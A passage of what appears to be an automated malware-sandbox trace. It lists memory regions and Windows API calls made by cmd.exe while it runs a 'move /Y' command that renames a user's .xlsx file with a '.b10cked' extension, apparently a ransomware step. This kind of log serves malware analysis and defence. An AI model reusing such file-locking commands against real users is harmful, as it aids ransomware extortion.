\"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11121 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11122 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11123 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11124 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11125 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11126 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11127 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11129 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 11130 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11151 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11152 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11153 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11154 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11155 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 11156 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11157 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11158 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11159 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11160 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11161 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11162 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11163 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11164 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11165 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11166 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11167 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11168 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11169 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 11170 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 11171 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 11172 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11173 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 11174 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 149 os_tid = 0x7dc [0129.370] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f7dc | out: lpSystemTimeAsFileTime=0x26f7dc*(dwLowDateTime=0x870ba120, dwHighDateTime=0x1d440a9)) [0129.370] GetCurrentProcessId () returned 0x7b8 [0129.370] GetCurrentThreadId () returned 0x7dc [0129.370] GetTickCount () returned 0x29645 [0129.370] QueryPerformanceCounter (in: lpPerformanceCount=0x26f7d4 | out: lpPerformanceCount=0x26f7d4*=18615899517) returned 1 [0129.370] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0129.370] __set_app_type (_Type=0x1) [0129.370] __p__fmode () returned 0x76b331f4 [0129.370] __p__commode () returned 0x76b331fc [0129.370] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0129.371] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0129.371] GetCurrentThreadId () returned 0x7dc [0129.371] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7dc) returned 0x38 [0129.371] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.371] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0129.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.371] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.371] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f76c | out: phkResult=0x26f76c*=0x0) returned 0x2 [0129.371] VirtualQuery (in: lpAddress=0x26f7a3, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.371] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.371] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.371] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.371] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0129.371] GetConsoleOutputCP () returned 0x1b5 [0129.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.371] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0129.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.372] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0129.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.372] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.372] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.372] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.372] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.372] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.372] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0129.372] GetEnvironmentStringsW () returned 0x2b0168* [0129.372] FreeEnvironmentStringsW (penv=0x2b0168) returned 1 [0129.373] GetEnvironmentStringsW () returned 0x2b0168* [0129.373] FreeEnvironmentStringsW (penv=0x2b0168) returned 1 [0129.373] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6dc | out: phkResult=0x26e6dc*=0x40) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x90, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x1, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x1, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x0, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x40, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x40, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x40, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegCloseKey (hKey=0x40) returned 0x0 [0129.373] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6dc | out: phkResult=0x26e6dc*=0x40) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x40, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x1, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x1, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x0, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x9, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x9, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x9, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegCloseKey (hKey=0x40) returned 0x0 [0129.373] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886363 [0129.373] srand (_Seed=0x5b886363) [0129.373] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"" [0129.373] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"" [0129.374] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.374] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0129.374] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.374] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.374] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.374] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0129.374] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0129.374] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0129.374] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0129.374] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0129.374] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0129.374] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0129.374] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0129.374] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0129.374] GetEnvironmentStringsW () returned 0x2b22b8* [0129.374] FreeEnvironmentStringsW (penv=0x2b22b8) returned 1 [0129.374] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.374] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0129.374] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0129.374] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0129.375] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0129.375] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0129.375] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0129.375] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0129.375] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0129.375] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0129.375] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.375] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f4a8, lpFilePart=0x26f4a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f4a4*="Desktop") returned 0x18 [0129.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.375] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f224 | out: lpFindFileData=0x26f224) returned 0x2afff8 [0129.375] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0129.375] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f224 | out: lpFindFileData=0x26f224) returned 0x2afff8 [0129.375] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0129.375] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f224 | out: lpFindFileData=0x26f224) returned 0x2afff8 [0129.375] FindClose (in: hFindFile=0x2afff8 | out: hFindFile=0x2afff8) returned 1 [0129.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0129.376] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0129.376] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0129.376] GetEnvironmentStringsW () returned 0x2b2ad8* [0129.376] FreeEnvironmentStringsW (penv=0x2b2ad8) returned 1 [0129.376] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0129.376] GetConsoleOutputCP () returned 0x1b5 [0129.377] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.377] GetUserDefaultLCID () returned 0x409 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f5e8, cchData=128 | out: lpLCData="0") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f5e8, cchData=128 | out: lpLCData="0") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f5e8, cchData=128 | out: lpLCData="1") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0129.377] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0129.377] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0129.378] GetConsoleTitleW (in: lpConsoleTitle=0x2a08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.378] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.378] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0129.378] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0129.378] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0129.379] _wcsicmp (_String1="move", _String2=")") returned 68 [0129.379] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0129.379] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0129.379] _wcsicmp (_String1="IF", _String2="move") returned -4 [0129.379] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0129.379] _wcsicmp (_String1="REM", _String2="move") returned 5 [0129.379] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0129.382] GetConsoleTitleW (in: lpConsoleTitle=0x26f2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.382] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0129.382] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0129.382] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0129.382] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0129.382] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="CD") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0129.382] _wcsicmp (_String1="move", _String2="REN") returned -5 [0129.382] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0129.382] _wcsicmp (_String1="move", _String2="SET") returned -6 [0129.382] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0129.382] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0129.382] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0129.382] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0129.382] _wcsicmp (_String1="move", _String2="MD") returned 11 [0129.382] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0129.382] _wcsicmp (_String1="move", _String2="RD") returned -5 [0129.382] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0129.382] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0129.382] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0129.382] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0129.382] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0129.382] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0129.382] _wcsicmp (_String1="move", _String2="VER") returned -9 [0129.382] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0129.382] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0129.383] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0129.383] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0129.383] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0129.383] _wcsicmp (_String1="move", _String2="START") returned -6 [0129.383] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0129.383] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0129.383] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0129.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0129.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0129.384] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f09c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f094, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f094*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0129.384] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0129.385] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 